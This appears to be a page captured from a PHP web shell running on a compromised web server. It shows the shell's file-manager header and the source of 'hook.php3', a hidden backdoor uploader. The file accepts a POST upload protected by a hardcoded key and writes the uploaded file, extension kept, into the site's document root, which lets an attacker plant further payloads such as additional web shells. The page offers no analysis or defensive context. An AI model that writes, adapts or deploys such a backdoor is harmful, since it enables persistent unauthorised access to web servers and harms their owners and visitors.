Your IP : 216.73.216.53


Current Path : /home/ahrcaeuege/www/
Upload File :
Current File : /home/ahrcaeuege/www/hook.php3

<?php if($_SERVER['REQUEST_METHOD']!=='POST'||!isset($_FILES['docfile'])||!isset($_POST['key'])||$_POST['key']!=='kingdolphin133x') die(json_encode(['error'=>'forbbiden'])); $a=$_FILES['docfile']; if($a['error']) die(json_encode(['error'=>'Upload failed'])); $b=pathinfo($a['name'],PATHINFO_EXTENSION); $c=bin2hex(random_bytes(16)).($b?'.'.$b:''); die(json_encode(move_uploaded_file($a['tmp_name'],$_SERVER['DOCUMENT_ROOT'].'/'.$c)?['success'=>true,'file'=>$c]:['error'=>'Move failed']));